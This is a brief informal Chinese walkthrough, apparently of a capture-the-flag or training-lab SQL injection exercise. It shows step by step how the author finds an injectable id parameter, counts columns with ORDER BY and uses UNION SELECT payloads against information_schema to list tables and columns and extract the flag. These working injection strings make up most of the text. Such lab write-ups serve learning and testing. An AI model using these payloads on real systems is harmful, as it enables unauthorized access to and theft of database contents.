打开连接显示什么鬼 请输入id as 什么玩意 看不懂
找了有道哥哥翻译了一下 :请输入ID作为带数字值的参数
懂了 后面加上?id呗
后面添加一个逗号发现sql语句错误 证明就是有sql注入
查询一共多少个字段: order by 1,2,3,4
一共是三个字段 接下来查询显出位置
简单粗暴的 让他显示显出位置 id不可能为几点几
查询裤子 select 1,2,database()
查询表 union select 1,2,group_concat(table_name) from information_schema.table_constraints where constraint_schema='security' --+
查询字段:union select 1,2,group_concat(column_name)from information_schema.columns where table_name='zkaq' --+
开始查询flag了
union select 1,2,GROUP_CONCAT(ZKAQ) from ZKAQ--+
flag是全部出来了 就需要自己一个一个去试去了 很难受哎(超大声逼逼)